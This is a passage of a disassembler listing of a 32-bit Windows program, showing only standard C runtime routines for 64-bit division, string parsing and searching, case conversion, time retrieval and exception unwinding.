loc_41344A: ; CODE XREF: sub_413421+5�j
xor eax, eax
locret_41344C: ; CODE XREF: sub_413421+13�j
; sub_413421+19�j
retn
sub_413421 endp
; =============== S U B R O U T I N E =======================================
sub_41344D proc near ; CODE XREF: sub_402717+1E�p
; sub_406B55+5E�p ...
arg_0 = dword ptr 4
push dword_47A014
push [esp+4+arg_0]
call sub_413421
pop ecx
pop ecx
retn
sub_41344D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_413460 proc near ; CODE XREF: sub_413498�p
mov eax, offset sub_4181D9
mov off_42CE18, eax
mov off_42CE1C, offset sub_417E53
mov off_42CE20, offset sub_417EB8
mov off_42CE24, offset sub_417E17
mov off_42CE28, offset sub_417E9E
mov off_42CE2C, eax
retn
sub_413460 endp
; =============== S U B R O U T I N E =======================================
sub_413498 proc near ; CODE XREF: sub_4143FB+9�p
; DATA XREF: .data:off_42C718�o
call sub_413460
call sub_41827C
mov dword_479E54, eax
call sub_41822A
fnclex
retn
sub_413498 endp
; =============== S U B R O U T I N E =======================================
sub_4134AF proc near ; CODE XREF: sub_40241F+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_41F06C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_4134CF
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
call sub_417C82
pop ecx
loc_4134CB: ; CODE XREF: sub_4134AF+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4134CF: ; CODE XREF: sub_4134AF+D�j
test al, 1
jz short loc_4134F2
test [esp+arg_4], 2
jz short loc_4134F2
call sub_417C70
mov dword ptr [eax], 0Dh
call sub_417C79
mov dword ptr [eax], 5
jmp short loc_4134CB
; ---------------------------------------------------------------------------
loc_4134F2: ; CODE XREF: sub_4134AF+22�j
; sub_4134AF+29�j
xor eax, eax
retn
sub_4134AF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413500 proc near ; CODE XREF: sub_402439+2A�p
; sub_414CA3+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_413531
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_413578
; ---------------------------------------------------------------------------
loc_413531: ; CODE XREF: sub_413500+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41353F: ; CODE XREF: sub_413500+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41353F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_41356D
cmp edx, [esp+4+arg_4]
ja short loc_41356D
jb short loc_413576
cmp eax, [esp+4+arg_0]
jbe short loc_413576
loc_41356D: ; CODE XREF: sub_413500+5D�j
; sub_413500+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_413576: ; CODE XREF: sub_413500+65�j
; sub_413500+6B�j
xor ebx, ebx
loc_413578: ; CODE XREF: sub_413500+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_413500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4135A0 proc near ; CODE XREF: sub_40253D+5F�p
; sub_40253D+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_4135C1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_4135C1: ; CODE XREF: sub_4135A0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_4135DD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_4135DD: ; CODE XREF: sub_4135A0+27�j
or eax, eax
jnz short loc_4135F9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41363A
; ---------------------------------------------------------------------------
loc_4135F9: ; CODE XREF: sub_4135A0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_413607: ; CODE XREF: sub_4135A0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_413607
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_413635
cmp edx, [esp+0Ch+arg_4]
ja short loc_413635
jb short loc_413636
cmp eax, [esp+0Ch+arg_0]
jbe short loc_413636
loc_413635: ; CODE XREF: sub_4135A0+85�j
; sub_4135A0+8B�j
dec esi
loc_413636: ; CODE XREF: sub_4135A0+8D�j
; sub_4135A0+93�j
xor edx, edx
mov eax, esi
loc_41363A: ; CODE XREF: sub_4135A0+57�j
dec edi
jnz short loc_413644
neg edx
neg eax
sbb edx, 0
loc_413644: ; CODE XREF: sub_4135A0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_4135A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41364A proc near ; CODE XREF: sub_413809+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_415456
mov esi, [eax+64h]
cmp esi, off_42C7BC
jz short loc_413668
call sub_41628E
mov esi, eax
loc_413668: ; CODE XREF: sub_41364A+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_413674: ; CODE XREF: sub_41364A+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_41368E
push 8
push eax
push esi
call sub_41608B
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_413698
; ---------------------------------------------------------------------------
loc_41368E: ; CODE XREF: sub_41364A+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_413698: ; CODE XREF: sub_41364A+42�j
test eax, eax
jz short loc_4136A1
mov bl, [edi]
inc edi
jmp short loc_413674
; ---------------------------------------------------------------------------
loc_4136A1: ; CODE XREF: sub_41364A+50�j
cmp bl, 2Dh
jnz short loc_4136AC
or [ebp+arg_C], 2
jmp short loc_4136B1
; ---------------------------------------------------------------------------
loc_4136AC: ; CODE XREF: sub_41364A+5A�j
cmp bl, 2Bh
jnz short loc_4136B4
loc_4136B1: ; CODE XREF: sub_41364A+60�j
mov bl, [edi]
inc edi
loc_4136B4: ; CODE XREF: sub_41364A+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_4137F9
cmp eax, 1
jz loc_4137F9
cmp eax, 24h
jg loc_4137F9
test eax, eax
push 10h
pop ecx
jnz short loc_4136FC
cmp bl, 30h
jz short loc_4136E6
mov [ebp+arg_8], 0Ah
jmp short loc_413714
; ---------------------------------------------------------------------------
loc_4136E6: ; CODE XREF: sub_41364A+91�j
mov al, [edi]
cmp al, 78h
jz short loc_4136F9
cmp al, 58h
jz short loc_4136F9
mov [ebp+arg_8], 8
jmp short loc_413714
; ---------------------------------------------------------------------------
loc_4136F9: ; CODE XREF: sub_41364A+A0�j
; sub_41364A+A4�j
mov [ebp+arg_8], ecx
loc_4136FC: ; CODE XREF: sub_41364A+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_413714
cmp bl, 30h
jnz short loc_413714
mov al, [edi]
cmp al, 78h
jz short loc_413710
cmp al, 58h
jnz short loc_413714
loc_413710: ; CODE XREF: sub_41364A+C0�j
inc edi
mov bl, [edi]
inc edi
loc_413714: ; CODE XREF: sub_41364A+9A�j
; sub_41364A+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41371C: ; CODE XREF: sub_41364A+134�j
mov esi, off_42CE30
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_413736
movsx ecx, bl
sub ecx, 30h
jmp short loc_413755
; ---------------------------------------------------------------------------
loc_413736: ; CODE XREF: sub_41364A+E2�j
test cx, 103h
jz short loc_413780
cmp bl, 61h
jl short loc_41374F
cmp bl, 7Ah
jg short loc_41374F
movsx ecx, bl
sub ecx, 20h
jmp short loc_413752
; ---------------------------------------------------------------------------
loc_41374F: ; CODE XREF: sub_41364A+F6�j
; sub_41364A+FB�j
movsx ecx, bl
loc_413752: ; CODE XREF: sub_41364A+103�j
add ecx, 0FFFFFFC9h
loc_413755: ; CODE XREF: sub_41364A+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_413780
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41376F
jnz short loc_413769
cmp ecx, edx
jbe short loc_41376F
loc_413769: ; CODE XREF: sub_41364A+119�j
or [ebp+arg_C], 4
jmp short loc_41377B
; ---------------------------------------------------------------------------
loc_41376F: ; CODE XREF: sub_41364A+117�j
; sub_41364A+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41377B: ; CODE XREF: sub_41364A+123�j
mov bl, [edi]
inc edi
jmp short loc_41371C
; ---------------------------------------------------------------------------
loc_413780: ; CODE XREF: sub_41364A+F1�j
; sub_41364A+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_413797
cmp [ebp+arg_4], 0
jz short loc_413791
mov edi, [ebp+arg_0]
loc_413791: ; CODE XREF: sub_41364A+142�j
and [ebp+var_4], 0
jmp short loc_4137E2
; ---------------------------------------------------------------------------
loc_413797: ; CODE XREF: sub_41364A+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_4137BB
test al, 1
jnz short loc_4137E2
and eax, 2
jz short loc_4137B2
cmp [ebp+var_4], 80000000h
ja short loc_4137BB
loc_4137B2: ; CODE XREF: sub_41364A+15D�j
test eax, eax
jnz short loc_4137E2
cmp [ebp+var_4], esi
jbe short loc_4137E2
loc_4137BB: ; CODE XREF: sub_41364A+154�j
; sub_41364A+166�j
call sub_417C70
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_4137D2
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4137E2
; ---------------------------------------------------------------------------
loc_4137D2: ; CODE XREF: sub_41364A+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_4137E2: ; CODE XREF: sub_41364A+14B�j
; sub_41364A+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4137EB
mov [eax], edi
loc_4137EB: ; CODE XREF: sub_41364A+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_4137F4
neg [ebp+var_4]
loc_4137F4: ; CODE XREF: sub_41364A+1A5�j
mov eax, [ebp+var_4]
jmp short loc_413804
; ---------------------------------------------------------------------------
loc_4137F9: ; CODE XREF: sub_41364A+6F�j
; sub_41364A+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_413802
mov [eax], ecx
loc_413802: ; CODE XREF: sub_41364A+1B4�j
xor eax, eax
loc_413804: ; CODE XREF: sub_41364A+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41364A endp
; =============== S U B R O U T I N E =======================================
sub_413809 proc near ; CODE XREF: sub_402B1D+440�p
; sub_4078FA+2787�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41364A
add esp, 10h
retn
sub_413809 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413820 proc near ; CODE XREF: sub_402B1D+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_41F140 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_414600
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_413857
mov [ecx], eax
locret_413857: ; CODE XREF: sub_413820+33�j
leave
retn
sub_413820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413859 proc near ; CODE XREF: sub_4030C4+2A�p
; sub_403B4C+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_415456
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_413885: ; CODE XREF: sub_413859+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_413885
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4138B4
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_4138B4
; ---------------------------------------------------------------------------
loc_4138AF: ; CODE XREF: sub_413859+72�j
test al, al
jz short loc_4138CD
inc edx
loc_4138B4: ; CODE XREF: sub_413859+4C�j
; sub_413859+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_4138AF
loc_4138CD: ; CODE XREF: sub_413859+58�j
mov ebx, edx
jmp short loc_4138E9
; ---------------------------------------------------------------------------
loc_4138D1: ; CODE XREF: sub_413859+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_4138F0
inc edx
loc_4138E9: ; CODE XREF: sub_413859+76�j
cmp byte ptr [edx], 0
jnz short loc_4138D1
jmp short loc_4138F4
; ---------------------------------------------------------------------------
loc_4138F0: ; CODE XREF: sub_413859+8D�j
and byte ptr [edx], 0
inc edx
loc_4138F4: ; CODE XREF: sub_413859+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_413859 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413920 proc near ; CODE XREF: sub_403E06+23A�p
; sub_403E06+26B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4139A0
mov dh, [ecx+1]
test dh, dh
jz short loc_41398D
loc_413938: ; CODE XREF: sub_413920+58�j
; sub_413920+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_41395E
test al, al
jz short loc_413958
loc_41394B: ; CODE XREF: sub_413920+36�j
mov al, [esi]
add esi, 1
loc_413950: ; CODE XREF: sub_413920+45�j
cmp al, dl
jz short loc_41395E
test al, al
jnz short loc_41394B
loc_413958: ; CODE XREF: sub_413920+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41395E: ; CODE XREF: sub_413920+25�j
; sub_413920+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_413950
lea edi, [esi-1]
loc_41396A: ; CODE XREF: sub_413920+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_413999
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_413938
mov al, [ecx+3]
test al, al
jz short loc_413999
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41396A
jmp short loc_413938
; ---------------------------------------------------------------------------
loc_41398D: ; CODE XREF: sub_413920+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_413F36
; ---------------------------------------------------------------------------
loc_413999: ; CODE XREF: sub_413920+4F�j
; sub_413920+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4139A0: ; CODE XREF: sub_413920+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_413920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4139A6 proc near ; CODE XREF: sub_413A6E+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_413A5A
cmp dword ptr [esi+24h], 0
jz short loc_4139CC
cmp ebx, 7Fh
jbe loc_413A5A
loc_4139CC: ; CODE XREF: sub_4139A6+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_4139F6
cmp [esi+28h], edi
jle short loc_4139E9
push edi
push ebx
push esi
call sub_41608B
add esp, 0Ch
jmp short loc_4139F2
; ---------------------------------------------------------------------------
loc_4139E9: ; CODE XREF: sub_4139A6+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_4139F2: ; CODE XREF: sub_4139A6+41�j
test eax, eax
jz short loc_413A67
loc_4139F6: ; CODE XREF: sub_4139A6+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_413A17
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_413A20
; ---------------------------------------------------------------------------
loc_413A17: ; CODE XREF: sub_4139A6+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_413A20: ; CODE XREF: sub_4139A6+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_4182E4
add esp, 20h
test eax, eax
jz short loc_413A67
cmp eax, edi
jnz short loc_413A4D
movzx eax, [ebp+var_4]
jmp short loc_413A69
; ---------------------------------------------------------------------------
loc_413A4D: ; CODE XREF: sub_4139A6+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_413A69
; ---------------------------------------------------------------------------
loc_413A5A: ; CODE XREF: sub_4139A6+11�j
; sub_4139A6+20�j
cmp ebx, 41h
jl short loc_413A67
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_413A69
loc_413A67: ; CODE XREF: sub_4139A6+4E�j
; sub_4139A6+9B�j ...
mov eax, ebx
loc_413A69: ; CODE XREF: sub_4139A6+A5�j
; sub_4139A6+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4139A6 endp
; =============== S U B R O U T I N E =======================================
sub_413A6E proc near ; CODE XREF: sub_4056EA+6�p
; sub_405AD5+56�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_413A83
call sub_41628E
loc_413A83: ; CODE XREF: sub_413A6E+E�j
push [esp+arg_0]
push eax
call sub_4139A6
pop ecx
pop ecx
retn
sub_413A6E endp
; =============== S U B R O U T I N E =======================================
sub_413A90 proc near ; CODE XREF: sub_405F05+27�p
; sub_405F46+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_413421
pop ecx
pop ecx
retn
sub_413A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413A9E proc near ; CODE XREF: sub_418B60+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_413A9E endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_413ACE proc near ; CODE XREF: sub_4187DB+25�p
; sub_4189E4+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_413ACE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AD5 proc near ; CODE XREF: sub_413B81+5A�p
; sub_418B60:loc_418B83�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_413AFE
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_41E8A6 ; RtlUnwind
loc_413AFE: ; DATA XREF: sub_413AD5+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_413AD5 endp
; ---------------------------------------------------------------------------
loc_413B27: ; CODE XREF: .text:0041E8BF�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_418E69
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_413B5D: ; DATA XREF: sub_413D01+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_418E69
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B81 proc near ; DATA XREF: sub_413D52+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_413BA2
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_413BEF
; ---------------------------------------------------------------------------
loc_413BA2: ; CODE XREF: sub_413B81+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_418E69
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_413BE0
push [ebp+arg_0]
push [ebp+arg_4]
call sub_413AD5
loc_413BE0: ; CODE XREF: sub_413B81+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_413BEF: ; CODE XREF: sub_413B81+1F�j
pop ebx
pop ebp
retn
sub_413B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413BF2 proc near ; CODE XREF: sub_418BC7+52�p
; sub_418C87+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_413C48
loc_413C10: ; CODE XREF: sub_413BF2+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_413C1A
call sub_418F40
loc_413C1A: ; CODE XREF: sub_413BF2+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_413C2E
cmp ecx, [eax+8]
jle short loc_413C33
loc_413C2E: ; CODE XREF: sub_413BF2+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_413C3F
loc_413C33: ; CODE XREF: sub_413BF2+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_413C3F: ; CODE XREF: sub_413BF2+3F�j
cmp [ebp+arg_4], 0
jge short loc_413C10
mov eax, [ebp+var_4]
loc_413C48: ; CODE XREF: sub_413BF2+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_413C5C
cmp esi, eax
jbe short loc_413C61
loc_413C5C: ; CODE XREF: sub_413BF2+64�j
call sub_418F40
loc_413C61: ; CODE XREF: sub_413BF2+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_413BF2 endp
; =============== S U B R O U T I N E =======================================
sub_413C6C proc near ; CODE XREF: sub_41883D+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_415456
mov eax, [eax+84h]
mov [esi+4], eax
call sub_415456
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_413C6C endp
; =============== S U B R O U T I N E =======================================
sub_413C94 proc near ; CODE XREF: sub_418980+4B�p
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+84h]
jmp short loc_413CAC
; ---------------------------------------------------------------------------
loc_413CA1: ; CODE XREF: sub_413C94+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_413CB2
mov eax, [eax+4]
loc_413CAC: ; CODE XREF: sub_413C94+B�j
test eax, eax
jnz short loc_413CA1
inc eax
retn
; ---------------------------------------------------------------------------
loc_413CB2: ; CODE XREF: sub_413C94+13�j
xor eax, eax
retn
sub_413C94 endp
; =============== S U B R O U T I N E =======================================
sub_413CB5 proc near ; CODE XREF: sub_418980+9�p
arg_0 = dword ptr 4
push esi
call sub_415456
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_413CD7
call sub_415456
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_413CD7: ; CODE XREF: sub_413CB5+10�j
call sub_415456
mov eax, [eax+84h]
jmp short loc_413CED
; ---------------------------------------------------------------------------
loc_413CE4: ; CODE XREF: sub_413CB5+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_413CF9
mov eax, ecx
loc_413CED: ; CODE XREF: sub_413CB5+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_413CE4
pop esi
jmp sub_418F40
; ---------------------------------------------------------------------------
loc_413CF9: ; CODE XREF: sub_413CB5+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_413CB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D01 proc near ; CODE XREF: sub_41883D+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
